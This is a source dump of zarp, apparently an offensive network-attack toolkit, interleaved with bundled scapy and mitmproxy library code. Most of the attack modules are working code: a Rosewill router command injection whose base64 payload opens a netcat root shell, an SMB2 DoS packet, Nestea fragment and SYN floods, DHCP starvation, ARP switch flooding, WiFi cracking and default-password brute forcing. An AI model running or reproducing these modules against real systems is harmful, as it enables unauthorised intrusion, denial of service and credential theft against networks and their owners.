27 | 28 | response = urlopen("http://%s/start_apply.htm" % 29 | self.config['target'].value, data).read() 30 | 31 | if "You cannot Login unless logout another user first" in response: 32 | util.Msg("Another user is logged in.") 33 | util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip) 34 | except Exception, e: 35 | util.Error('Error: %s' % e) 36 | -------------------------------------------------------------------------------- /src/modules/attacks/redirect_port.py: -------------------------------------------------------------------------------- 1 | from attack import Attack 2 | import util 3 | from zoption import Zoption 4 | 5 | 6 | class redirect_port(Attack): 7 | def __init__(self): 8 | super(redirect_port, self).__init__("redirect_port") 9 | self.iptable = "iptables -t nat -A PREROUTING -p tcp --dport {0} -j REDIRECT --to-port {1}" 10 | self.config.update({"source_port": Zoption(type="int", value=80, required=True, display="Source port"), 11 | "dest_port": Zoption(type="int", value=8080, required=True, display="Destination port")}) 12 | self.config.update({}) 13 | self.running = False 14 | self.info = """ 15 | Redirects inbound TCP traffic on source port to destination port on localhost 16 | """ 17 | 18 | def modip(self, enable=True): 19 | """ 20 | Enable or disable the iptable rule 21 | """ 22 | to_exec = self.iptable.format(self.config['source_port'].value, self.config['dest_port'].value) 23 | if enable: 24 | util.init_app(to_exec) 25 | else: 26 | util.init_app(to_exec.replace('-A', '-D')) 27 | 28 | def initialize(self): 29 | util.Msg("Starting redirect_port...") 30 | 31 | self.modip() 32 | 33 | self.running = True 34 | 35 | util.Msg("Redirection to from TCP port {0} to {1}...".format(self.config['source_port'].value, self.config['dest_port'].value)) 36 | 37 | return True 38 | 39 | def shutdown(self): 40 | util.Msg("Shutting down RedirectPort...") 41 | self.modip(False) 42 | 43 | def session_view(self): 44 | """ 45 | Return information about the redirections 46 | """ 47 | return "Redirect from {0} to {1}".format(self.config['source_port'].value, self.config['dest_port'].value) 48 | -------------------------------------------------------------------------------- /src/modules/dos/nestea_dos.py: -------------------------------------------------------------------------------- 1 | import util 2 | from scapy.all import * 3 | from dos import DoS 4 | 5 | 6 | class nestea_dos(DoS): 7 | """ Linux-equivalent to the Teardrop DoS, works on 2.0 and 2.1. 8 | Attack works by sending fragmented datagram pairs to a host. The 9 | first host begins at offset 0 (first packet), with a payload of N. 10 | The following packet is set to overlap within the previous fragment. 11 | """ 12 | def __init__(self): 13 | super(nestea_dos, self).__init__('Nestea DoS') 14 | conf.verb = 0 15 | self.info = """ 16 | Linux-equivalent to the teardrop attack, this sends 17 | fragmented datagram packets with overlapping payloads.""" 18 | 19 | def initialize(self): 20 | target = self.config['target'].value 21 | try: 22 | pkt1 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 10) 23 | pkt2 = IP(dst=target, id=42, frag=48) / ("X" * 116) 24 | pkt3 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 224) 25 | while True: 26 | util.Msg('DoSing %s...' % target) 27 | send(pkt1) 28 | send(pkt2) 29 | send(pkt3) 30 | 31 | if self.is_alive(): 32 | util.Msg('Host appears to still be up.') 33 | try: 34 | tmp = raw_input('[!] Try again? [Y/n] ') 35 | except Exception: 36 | break 37 | if 'n' in tmp.lower(): 38 | break 39 | else: 40 | util.Msg('Host not responding!') 41 | break 42 | except KeyboardInterrupt: 43 | return 44 | except Exception: 45 | util.Error('Error with given address. Could not complete DoS.') 46 | return 47 | -------------------------------------------------------------------------------- /src/modules/scanner/ap_scan.py: -------------------------------------------------------------------------------- 1 | import os 2 | import util 3 | from scanner import Scanner 4 | 5 | 6 | class ap_scan(Scanner): 7 | def __init__(self): 8 | self.channel = None 9 | super(ap_scan, self).__init__('AP Scan') 10 | self.info = """ 11 | Scan for wireless APs. Useful when searching for WEP or 12 | unprotected APs. Essentially an interface to airodump-ng. 13 | """ 14 | 15 | def initialize(self): 16 | """ Initialize the scanner 17 | """ 18 | try: 19 | if not util.check_program('airmon-ng'): 20 | util.Error('airomon-ng not installed. Please install to continue.') 21 | return None 22 | util.Msg('(ctrl^c) when finished.') 23 | iface = util.get_monitor_adapter() 24 | if iface is None: 25 | util.Msg('No devices found in monitor mode. Enabling...') 26 | iface = util.enable_monitor(self.channel) 27 | util.debug('Using interface %s' % iface) 28 | self.ap_scan(iface) 29 | except Exception: 30 | return 31 | 32 | def ap_scan(self, adapt): 33 | """ Sniff on the monitoring adapter 34 | """ 35 | try: 36 | util.Msg('Scanning for access points...') 37 | if self.channel is None: 38 | os.system('airodump-ng %s' % adapt) 39 | else: 40 | os.system('airodump-ng --channel %s %s' % (self.channel, adapt)) 41 | except Exception, j: 42 | util.Error('Error scanning: %s' % j) 43 | finally: 44 | util.disable_monitor() 45 | 46 | def cli(self, parser): 47 | """ Add the CLI options 48 | """ 49 | parser.add_argument('-w', help='Wireless AP Scan', action='store_true', 50 | default=False, dest=self.which) 51 | -------------------------------------------------------------------------------- /src/modules/parameter/router_pwn.py: -------------------------------------------------------------------------------- 1 | import importlib 2 | import routers 3 | import util 4 | import stream 5 | from parameter import Parameter 6 | 7 | 8 | class router_pwn(Parameter): 9 | """ Router pwn module for managing and pwning routers 10 | """ 11 | 12 | def __init__(self): 13 | super(router_pwn, self).__init__('RouterPwn') 14 | self.routers = {} 15 | self.skip_opts = True 16 | 17 | def load(self): 18 | """Load router modules""" 19 | for router in routers.__all__: 20 | # relative to zarp.py 21 | mod = importlib.import_module('modules.parameter.routers.%s' 22 | % router) 23 | self.routers[router] = [] 24 | for vuln in mod.__all__: 25 | path = "modules.parameter.routers.%s.%s" % (router, vuln) 26 | if util.check_dependency(path): 27 | mod = getattr(importlib.import_module(path, 'routers'), vuln) 28 | self.routers[router].append(mod) 29 | 30 | def initialize(self): 31 | """ Load router exploits; store {router:[vuln]} 32 | """ 33 | self.load() 34 | while True: 35 | choice = util.print_menu([x for x in self.routers.keys()]) 36 | if choice is 0: 37 | del(self.routers) 38 | break 39 | elif choice is -1 or choice > len(self.routers.keys()): 40 | pass 41 | else: 42 | router = self.routers[self.routers.keys()[choice - 1]] 43 | while True: 44 | choice = util.print_menu([x().which for x in router]) 45 | if choice is 0: 46 | break 47 | elif choice is -1 or choice > len(router): 48 | pass 49 | else: 50 | stream.initialize(router[choice - 1]) 51 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/default_passwords.py: -------------------------------------------------------------------------------- 1 | """ Aggregation of default passwords, organized by brand. Only 2 | brands with exploits in zarp are present. 3 | """ 4 | 5 | 6 | def default_list(brand): 7 | """ Return a list of potential or default username/password 8 | combinations for a router. This is more refined than a 9 | brute force attempt with a fat wordlist. 10 | """ 11 | brand = globals().get(brand)() 12 | if not brand: 13 | return None 14 | 15 | base = general() 16 | 17 | # uniquely combine lists 18 | base['username'] = list(set(base['username'] + brand['username'])) 19 | base['password'] = list(set(base['password'] + brand['password'])) 20 | return base 21 | 22 | 23 | def general(): 24 | """ standard username/password combinations that could be 25 | applicable to any device. Each brand should return the 26 | union of the general set and their specific subset. 27 | """ 28 | return {'username': ['', 'admin', 'administrator'], 29 | 'password': ['', 'admin', 'administrator', 'password', '1234'] 30 | } 31 | 32 | 33 | # 34 | # Brand-specific usernames/passwords 35 | # 36 | def cisco(): 37 | return {'username': ['Cisco', 'cisco', 'Administrator', 'root'], 38 | 'password': ['Cisco', 'cisco', 'Administrator', '_Cisco', 'letmein'] 39 | } 40 | 41 | 42 | def asus(): 43 | return {'username': [], 44 | 'password': [] 45 | } 46 | 47 | 48 | def rosewill(): 49 | return {'username': [], 50 | 'password': ['guest'], 51 | } 52 | 53 | 54 | def dlink(): 55 | return {'username': [], 56 | 'password': ['public'] 57 | } 58 | 59 | 60 | def linksys(): 61 | return {'username': [], 62 | 'password': ['epicrouter'] 63 | } 64 | 65 | 66 | def netgear(): 67 | return {'username': [], 68 | 'password': ['netgear1', 'setup', 'Administrator'] 69 | } 70 | -------------------------------------------------------------------------------- /src/modules/parameter/ap_crack.py: -------------------------------------------------------------------------------- 1 | import util 2 | import os 3 | from parameter import Parameter 4 | from zoption import Zoption 5 | 6 | 7 | class ap_crack(Parameter): 8 | """ Interfaces with Wifite to crack APs 9 | """ 10 | def __init__(self): 11 | super(ap_crack, self).__init__('APCrack') 12 | self.config.update({"mode":Zoption(type = "int", 13 | value = 1, 14 | required = True, 15 | display = "Mode to crack", 16 | opts = ['WEP', 'WPA', 'WPS']) 17 | }) 18 | self.info = """ 19 | Harnesses the power of Wifite to crack WEP, WPA, and WPS 20 | devices.""" 21 | 22 | def initialize(self): 23 | choice = self.config['mode'].value 24 | 25 | cmd = [] 26 | while True: 27 | if choice is 1: 28 | cmd = ['python', 29 | 'src/modules/parameter/wifite.py', 30 | '--wep', 31 | '--wept', '300', 32 | '--nofakeauth'] 33 | break 34 | elif choice is 2: 35 | cmd = ['python', 36 | 'src/modules/parameter/wifite.py', 37 | '--wpa', 38 | '--wpat', '10', 39 | '--wpadt', '2'] 40 | break 41 | elif choice is 3: 42 | cmd = ['python', 43 | 'src/modules/parameter/wifite.py', 44 | '--wps', 45 | '--wpst', '5', 46 | '--wpsretry', '8'] 47 | break 48 | else: 49 | return False 50 | 51 | try: 52 | os.system(' '.join(cmd)) 53 | except KeyboardInterrupt: 54 | pass 55 | except Exception, j: 56 | util.Error('Error initializing Wifite: %s' % j) 57 | 58 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/rosewill/rsva_backdoor.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import util 3 | from time import sleep 4 | from ..router_vuln import RouterVuln 5 | 6 | 7 | class rsva_backdoor(RouterVuln): 8 | 9 | def __init__(self): 10 | self.router = 'RSVA11001' 11 | self.vuln = 'Backdoor Root' 12 | self.inject = "UkVNT1RFIEhJX1NSREtfVElNRV9TZXRUaW1lU2V0QXR0ciBNQ1RQLzEuMA0KQ"\ 13 | "1NlcTo2Ng0KQWNjZXB0OnRleHQvSERQDQpDb250ZW50LVR5cGU6dGV4dC9IRFAN"\ 14 | "CkZ1bmMtVmVyc2lvbjoweDEwDQpDb250ZW50LUxlbmd0aDoxMjQNCg0KU2VnbWV"\ 15 | "udC1OdW06MQ0KU2VnbWVudC1TZXE6MQ0KRGF0YS1MZW5ndGg6NzYNCg0KAQAGAW"\ 16 | "E7L3Vzci9iaW4vbmMgLWwgLXAgNTU1NSAtZSAvYmluL3NoAA4jAQBAAAAAAAAAA"\ 17 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" 18 | self.hard_save = "UkVNT1RFIEhJX1NSREtfREVWX1NhdmVGbGFzaCBNQ1RQLzEuMA0KQ1NlcT"\ 19 | "o0MQ0KQWNjZXB0OnRleHQvSERQDQpDb250ZW50LVR5cGU6dGV4dC9IRFAN"\ 20 | "CkZ1bmMtVmVyc2lvbjoweDEwDQpDb250ZW50LUxlbmd0aDoxNQ0KDQpTZW"\ 21 | "dtZW50LU51bTowDQo=" 22 | super(rsva_backdoor, self).__init__() 23 | 24 | self.info = """ 25 | Execute a remote netcat shell through command injection 26 | http://www.exploit-db.com/exploits/24892 27 | """ 28 | 29 | def initialize(self): 30 | try: 31 | util.Msg('Executing command injection on %s...' % self.config['target'].value) 32 | sock = socket.socket() 33 | sock.connect((self.config['target'].value, 8000)) 34 | sock.sendall(self.inject) 35 | sleep(3) 36 | util.Msg('Forcing the device to save...') 37 | sock.sendall(self.hard_save) 38 | sock.close() 39 | util.Msg('Reboot router for root shell on %s:5555' % (self.config['target'].value)) 40 | except Exception, e: 41 | util.Error('Error: %s' % e) 42 | -------------------------------------------------------------------------------- /src/lib/scapy/error.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | ############################# 8 | ##### Logging subsystem ##### 9 | ############################# 10 | 11 | class Scapy_Exception(Exception): 12 | pass 13 | 14 | import logging,traceback,time 15 | 16 | class ScapyFreqFilter(logging.Filter): 17 | def __init__(self): 18 | logging.Filter.__init__(self) 19 | self.warning_table = {} 20 | def filter(self, record): 21 | from config import conf 22 | wt = conf.warning_threshold 23 | if wt > 0: 24 | stk = traceback.extract_stack() 25 | caller=None 26 | for f,l,n,c in stk: 27 | if n == 'warning': 28 | break 29 | caller = l 30 | tm,nb = self.warning_table.get(caller, (0,0)) 31 | ltm = time.time() 32 | if ltm-tm > wt: 33 | tm = ltm 34 | nb = 0 35 | else: 36 | if nb < 2: 37 | nb += 1 38 | if nb == 2: 39 | record.msg = "more "+record.msg 40 | else: 41 | return 0 42 | self.warning_table[caller] = (tm,nb) 43 | return 1 44 | 45 | log_scapy = logging.getLogger("scapy") 46 | console_handler = logging.StreamHandler() 47 | console_handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s")) 48 | log_scapy.addHandler(console_handler) 49 | log_runtime = logging.getLogger("scapy.runtime") # logs at runtime 50 | log_runtime.addFilter(ScapyFreqFilter()) 51 | log_interactive = logging.getLogger("scapy.interactive") # logs in interactive functions 52 | log_loading = logging.getLogger("scapy.loading") # logs when loading scapy 53 | 54 | 55 | def warning(x): 56 | log_runtime.warning(x) 57 | 58 | -------------------------------------------------------------------------------- /src/modules/dos/dhcp_starvation.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from time import sleep 3 | from util import Msg 4 | from dos import DoS 5 | from threading import Thread 6 | from zoption import Zoption 7 | 8 | """DHCP starvation attack involves firing off DHCP request packets with random 9 | MAC addresses. With this we can exhaust the address space reserved by the 10 | DHCP server. This attack can be a viable stepping stone in the introduction 11 | of a rogue DHCP server. 12 | http://hakipedia.com/index.php/DHCP_Starvation 13 | """ 14 | 15 | 16 | class dhcp_starvation(DoS): 17 | def __init__(self): 18 | super(dhcp_starvation, self).__init__('DHCP Starvation') 19 | conf.verb = 0 20 | self.config.pop("target", None) 21 | self.config.update({"interval":Zoption(type = "int", 22 | value = 0.1, 23 | required = False, 24 | display = "Interval to send advertisements") 25 | }) 26 | self.info = """ 27 | Cause a denial of service against a local DHCP server. 28 | This will simply request IP addresses from randomized 29 | MAC sources.""" 30 | 31 | def initialize(self): 32 | Msg('Beginning DHCP starvation...') 33 | conf.checkIPaddr = False 34 | thread = Thread(target=self.starve) 35 | self.running = True 36 | thread.start() 37 | return True 38 | 39 | def starve(self): 40 | """ Starve the network of DHCP leases 41 | """ 42 | while self.running: 43 | pkt = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff") 44 | pkt /= IP(src="0.0.0.0", dst="255.255.255.255") 45 | pkt /= UDP(sport=68, dport=67) 46 | pkt /= BOOTP(chaddr=RandString(12, '0123456789abcdef')) 47 | pkt /= DHCP(options=[("message-type", 'discover'), 'end']) 48 | sendp(pkt) 49 | sleep(self.config['interval'].value) 50 | -------------------------------------------------------------------------------- /src/modules/sniffer/sniffer.py: -------------------------------------------------------------------------------- 1 | from module import ZarpModule 2 | from scapy.all import sniff 3 | from threading import Thread 4 | from zoption import Zoption 5 | import util 6 | import config 7 | import abc 8 | 9 | 10 | class Sniffer(ZarpModule): 11 | """ Abstract sniffer """ 12 | __metaclass__ = abc.ABCMeta 13 | 14 | def __init__(self, which): 15 | super(Sniffer, self).__init__(which) 16 | self.sniff_filter = None # filter for the traffic sniffer 17 | # initialize thread 18 | self.sniff_thread = Thread(target=self.traffic_sniffer) 19 | 20 | self.config.update({"target":Zoption(type = "ip", 21 | value = config.get("ip_addr"), 22 | required = False, 23 | display = "Address to sniff from") 24 | }) 25 | 26 | @abc.abstractmethod 27 | def dump(self, pkt): 28 | raise NotImplementedError 29 | 30 | def session_view(self): 31 | 32 | """ Session viewer returns source 33 | """ 34 | return '%s' % self.config['target'].value 35 | 36 | def traffic_sniffer(self): 37 | """ Sniff traffic with the given filter. 38 | If sniff_filter is not set, an exception is raised 39 | """ 40 | if self.sniff_filter is None: 41 | raise NotImplementedError, "sniff_filter not initialized!" 42 | 43 | sniff(filter=self.sniff_filter, store=0, prn=self.dump, 44 | stopper=self.stop_callback, stopperTimeout=3) 45 | 46 | def stop_callback(self): 47 | """ Initiate a sniffer shutdown""" 48 | if self.running: 49 | return False 50 | util.debug('%s shutting down...' % self.which) 51 | return True 52 | 53 | def run(self): 54 | """Friendly handler""" 55 | try: 56 | self.running = True 57 | self.sniff_thread.start() 58 | except Exception, e: 59 | util.Error('Error with sniffer: %s' % (e)) 60 | -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/jsbeautifier/unpackers/javascriptobfuscator.py: -------------------------------------------------------------------------------- 1 | # 2 | # simple unpacker/deobfuscator for scripts messed up with 3 | # javascriptobfuscator.com 4 | # 5 | # written by Einar Lielmanis 6 | # rewritten in Python by Stefano Sanfilippo 7 | # 8 | # Will always return valid javascript: if `detect()` is false, `code` is 9 | # returned, unmodified. 10 | # 11 | # usage: 12 | # 13 | # if javascriptobfuscator.detect(some_string): 14 | # some_string = javascriptobfuscator.unpack(some_string) 15 | # 16 | 17 | """deobfuscator for scripts messed up with JavascriptObfuscator.com""" 18 | 19 | import re 20 | 21 | PRIORITY = 1 22 | 23 | def smartsplit(code): 24 | """Split `code` at " symbol, only if it is not escaped.""" 25 | strings = [] 26 | pos = 0 27 | while pos < len(code): 28 | if code[pos] == '"': 29 | word = '' # new word 30 | pos += 1 31 | while pos < len(code): 32 | if code[pos] == '"': 33 | break 34 | if code[pos] == '\\': 35 | word += '\\' 36 | pos += 1 37 | word += code[pos] 38 | pos += 1 39 | strings.append('"%s"' % word) 40 | pos += 1 41 | return strings 42 | 43 | def detect(code): 44 | """Detects if `code` is JavascriptObfuscator.com packed.""" 45 | # prefer `is not` idiom, so that a true boolean is returned 46 | return (re.search(r'^var _0x[a-f0-9]+ ?\= ?\[', code) is not None) 47 | 48 | def unpack(code): 49 | """Unpacks JavascriptObfuscator.com packed code.""" 50 | if detect(code): 51 | matches = re.search(r'var (_0x[a-f\d]+) ?\= ?\[(.*?)\];', code) 52 | if matches: 53 | variable = matches.group(1) 54 | dictionary = smartsplit(matches.group(2)) 55 | code = code[len(matches.group(0)):] 56 | for key, value in enumerate(dictionary): 57 | code = code.replace(r'%s[%s]' % (variable, key), value) 58 | return code 59 | -------------------------------------------------------------------------------- /src/modules/dos/tcp_syn.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from threading import Thread 3 | from dos import DoS 4 | from util import Msg 5 | from zoption import Zoption 6 | 7 | 8 | class tcp_syn(DoS): 9 | def __init__(self): 10 | """ Simple TCP SYN flooder. Absolutely nothing fancy, and could 11 | probably use some love. 12 | """ 13 | super(tcp_syn, self).__init__('TCP SYN') 14 | conf.verb = 0 15 | self.config.update({"port":Zoption(type = "int", 16 | value = 80, 17 | required = False, 18 | display = "Attack port"), 19 | "count":Zoption(type = "int", 20 | value = -1, 21 | required = False, 22 | display = "Number of packets to send (-1 infinite)") 23 | }) 24 | self.info = """ 25 | Very basic TCP SYN flooder that just spams SYN packets 26 | towards the host/port. 27 | """ 28 | 29 | def initialize(self): 30 | Msg('Flooding \'%s\'...' % self.config['target'].value) 31 | thread = Thread(target=self.flood) 32 | self.running = True 33 | thread.start() 34 | return True 35 | 36 | def flood(self): 37 | """ Send packets 38 | """ 39 | pkt = IP(dst=self.config['target'].value) 40 | pkt /= TCP(dport=self.config['port'].value, 41 | window=1000, flags='S') 42 | cnt = 0 43 | while self.running: 44 | if self.config['count'].value > 0 and \ 45 | cnt >= self.config['count'].value: 46 | break 47 | 48 | send(pkt) 49 | cnt += 1 50 | self.shutdown() 51 | 52 | def session_view(self): 53 | """ return ip/port of spammed host 54 | """ 55 | return "%s:%d" % (self.config['target'].value, 56 | self.config['port'].value) -------------------------------------------------------------------------------- /src/lib/scapy/modules/geoip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.data import KnowledgeBase 7 | from scapy.config import conf 8 | 9 | conf.IPCountry_base = "GeoIPCountry4Scapy.gz" 10 | conf.countryLoc_base = "countryLoc.csv" 11 | conf.gnuplot_world = "world.dat" 12 | 13 | 14 | ########################## 15 | ## IP location database ## 16 | ########################## 17 | 18 | class IPCountryKnowledgeBase(KnowledgeBase): 19 | """ 20 | How to generate the base : 21 | db = [] 22 | for l in open("GeoIPCountryWhois.csv").readlines(): 23 | s,e,c = l.split(",")[2:5] 24 | db.append((int(s[1:-1]),int(e[1:-1]),c[1:-1])) 25 | cPickle.dump(gzip.open("xxx","w"),db) 26 | """ 27 | def lazy_init(self): 28 | self.base = load_object(self.filename) 29 | 30 | 31 | class CountryLocKnowledgeBase(KnowledgeBase): 32 | def lazy_init(self): 33 | f=open(self.filename) 34 | self.base = {} 35 | while 1: 36 | l = f.readline() 37 | if not l: 38 | break 39 | l = l.strip().split(",") 40 | if len(l) != 3: 41 | continue 42 | c,lat,long = l 43 | 44 | self.base[c] = (float(long),float(lat)) 45 | f.close() 46 | 47 | 48 | 49 | @conf.commands.register 50 | def locate_ip(ip): 51 | """Get geographic coordinates from IP using geoip database""" 52 | ip=map(int,ip.split(".")) 53 | ip = ip[3]+(ip[2]<<8L)+(ip[1]<<16L)+(ip[0]<<24L) 54 | 55 | cloc = country_loc_kdb.get_base() 56 | db = IP_country_kdb.get_base() 57 | 58 | d=0 59 | f=len(db)-1 60 | while (f-d) > 1: 61 | guess = (d+f)/2 62 | if ip > db[guess][0]: 63 | d = guess 64 | else: 65 | f = guess 66 | s,e,c = db[guess] 67 | if s <= ip and ip <= e: 68 | return cloc.get(c,None) 69 | 70 | 71 | 72 | 73 | 74 | conf.IP_country_kdb = IPCountryKnowledgeBase(conf.IPCountry_base) 75 | conf.country_loc_kdb = CountryLocKnowledgeBase(conf.countryLoc_base) 76 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/router_vuln.py: -------------------------------------------------------------------------------- 1 | import abc 2 | import urllib2 3 | from base64 import b64encode 4 | from util import Msg 5 | from module import ZarpModule 6 | from zoption import Zoption 7 | from default_passwords import default_list 8 | 9 | 10 | class RouterVuln(ZarpModule): 11 | """Abstract router vulnerability""" 12 | 13 | def __init__(self): 14 | super(RouterVuln, self).__init__("%s - %s" % (self.router, self.vuln)) 15 | self.config.update({"target":Zoption(type = "ip", 16 | value = "192.168.1.1", 17 | required = False, 18 | display = "Address to target") 19 | }) 20 | 21 | def attempt_login(self, brand): 22 | """ Attempts to login to the router with default credentials. This will 23 | only work with routers that use HTTP basic auth. 24 | brand is the type of router being hit. 25 | 26 | Useful for vulnerabilities that require authentication. 27 | """ 28 | try: 29 | Msg('Attempting to discover credentials for %s...' % self.ip) 30 | wordlist = default_list(brand) 31 | for username in wordlist['username']: 32 | for password in wordlist['password']: 33 | # look for a 200 34 | auth_string = b64encode('%s:%s' % (username, password)) 35 | opener = urllib2.build_opener() 36 | opener.addheaders.append(('Authorization', 'Basic %s' 37 | % auth_string)) 38 | 39 | try: 40 | response = opener.open('http://%s/' % self.ip) 41 | if response.getcode() is 200: 42 | Msg('Credentials found - %s:%s' 43 | % (username, password)) 44 | return 45 | except urllib2.HTTPError, e: 46 | if e.code is 401: 47 | pass 48 | Msg('No credentials found.') 49 | except Exception, e: 50 | print e 51 | -------------------------------------------------------------------------------- /src/modules/dos/smb2_dos.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import util 3 | from dos import DoS 4 | 5 | 6 | class smb2_dos(DoS): 7 | """ Exploit a & in an SMB header. Triggers in Vista Sp1/sp2/Server 2008/sp2 8 | and windows 7 RC (unconfirmed in win7 sp1) 9 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103 10 | """ 11 | 12 | def __init__(self): 13 | super(smb2_dos, self).__init__('SMB2 DoS') 14 | self.info = """ 15 | Exploits a vulnerability in an SMB header, causing a DoS 16 | in the host. 17 | 18 | Windows Vista SP1/SP2, Server 2008/SP2, and Windows 7 RC 19 | are all affected. 20 | """ 21 | 22 | def initialize(self): 23 | """ Initialize the DoS 24 | """ 25 | try: 26 | util.Msg("Sending payload...") 27 | pkt = ( 28 | "\x00\x00\x00\x90" 29 | "\xff\x53\x4d\x42" 30 | "\x72\x00\x00\x00" 31 | "\x00\x18\x53\xc8" 32 | "\x00\x26" 33 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" 34 | "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" 35 | "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" 36 | "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 37 | "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" 38 | "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" 39 | "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" 40 | "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" 41 | "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" 42 | "\x30\x30\x32\x00") 43 | 44 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 45 | 46 | sock.connect((self.config['target'].value, 445)) 47 | sock.send(pkt) 48 | sock.close() 49 | 50 | if self.is_alive(): 51 | util.Msg('Host appears to be up') 52 | else: 53 | util.Msg('Host is not responding - ' 54 | 'it is either down or rejecting our probes.') 55 | except Exception: 56 | util.Error('Remote host not susceptible to vulnerability.') 57 | return 58 | -------------------------------------------------------------------------------- /src/modules/parameter/switchover.py: -------------------------------------------------------------------------------- 1 | import util 2 | from scapy.all import ARP, Ether, sendp 3 | from scapy.volatile import RandMAC 4 | from scapy.layers.l2 import getmacbyip 5 | from threading import Thread 6 | from parameter import Parameter 7 | from zoption import Zoption 8 | 9 | 10 | class switchover(Parameter): 11 | """ Flood a switch with ARP packets in an attempt 12 | to get it to failover into a hub. Not all switch's 13 | will do this, but this is the general case. 14 | """ 15 | def __init__(self): 16 | super(switchover, self).__init__('Switch Over') 17 | self.switch = None 18 | self.sent = 0 19 | self.config.update({"target":Zoption(type = "ip", 20 | value = "FF:FF:FF:FF:FF:FF", 21 | required = False, 22 | display = "Switch address") 23 | }) 24 | self.info = """ 25 | In some switches, if the ARP table is overflowed, 26 | the device will switch from routing packets to simply 27 | spewing packets to each port, a la a hub. This will 28 | allow an attacker who may have been unable to sniff 29 | or poison certain traffic the ability to.""" 30 | 31 | def initialize(self): 32 | util.Msg("Starting switch flood...") 33 | self.switch = getmacbyip(self.config['target'].value) 34 | self.running = True 35 | 36 | thread = Thread(target=self.spam) 37 | thread.start() 38 | return True 39 | 40 | def spam(self): 41 | """ Begin spamming the switch with ARP packets from 42 | random MAC's 43 | """ 44 | arp = ARP(op=2, psrc='0.0.0.0', hwdst=self.switch) 45 | while self.running: 46 | pkt = Ether(src=RandMAC(), dst=self.switch) 47 | pkt /= arp 48 | sendp(pkt) 49 | self.sent += 1 50 | if self.sent % 50 == 0: 51 | self.log_msg('Sent %d requests...' % (self.sent)) 52 | 53 | def view(self): 54 | """ Dump out the number of requests initially 55 | """ 56 | util.Msg('Sent %d MAC requests thus far' % (self.sent)) 57 | super(switchover, self).view() 58 | 59 | def session_view(self): 60 | return "Spamming %s" % self.config['target'].value 61 | -------------------------------------------------------------------------------- /src/lib/libmproxy/script.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2012 Aldo Cortesi 2 | # 3 | # This program is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program. If not, see . 15 | 16 | import os, traceback 17 | 18 | class ScriptError(Exception): 19 | pass 20 | 21 | 22 | class Script: 23 | """ 24 | The instantiator should do something along this vein: 25 | 26 | s = Script(path, master) 27 | s.load() 28 | s.run("start") 29 | """ 30 | def __init__(self, path, ctx): 31 | self.path, self.ctx = path, ctx 32 | self.ns = None 33 | 34 | def load(self): 35 | """ 36 | Loads a module. 37 | 38 | Raises ScriptError on failure, with argument equal to an error 39 | message that may be a formatted traceback. 40 | """ 41 | path = os.path.expanduser(self.path) 42 | if not os.path.exists(path): 43 | raise ScriptError("No such file: %s"%self.path) 44 | if not os.path.isfile(path): 45 | raise ScriptError("Not a file: %s"%self.path) 46 | ns = {} 47 | try: 48 | execfile(path, ns, ns) 49 | except Exception, v: 50 | raise ScriptError(traceback.format_exc(v)) 51 | self.ns = ns 52 | 53 | def run(self, name, *args, **kwargs): 54 | """ 55 | Runs a plugin method. 56 | 57 | Returns: 58 | 59 | (True, retval) on success. 60 | (False, None) on nonexistent method. 61 | (False, (exc, traceback string)) if there was an exception. 62 | """ 63 | f = self.ns.get(name) 64 | if f: 65 | try: 66 | return (True, f(self.ctx, *args, **kwargs)) 67 | except Exception, v: 68 | return (False, (v, traceback.format_exc(v))) 69 | else: 70 | return (False, None) 71 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/llmnr.py: -------------------------------------------------------------------------------- 1 | from scapy.fields import * 2 | from scapy.packet import * 3 | from scapy.layers.inet import UDP 4 | from scapy.layers.dns import DNSQRField, DNSRRField, DNSRRCountField 5 | 6 | 7 | ############################################################################# 8 | ### LLMNR (RFC4795) ### 9 | ############################################################################# 10 | # LLMNR is based on the DNS packet format (RFC1035 Section 4) 11 | # RFC also envisions LLMNR over TCP. Like vista, we don't support it -- arno 12 | 13 | 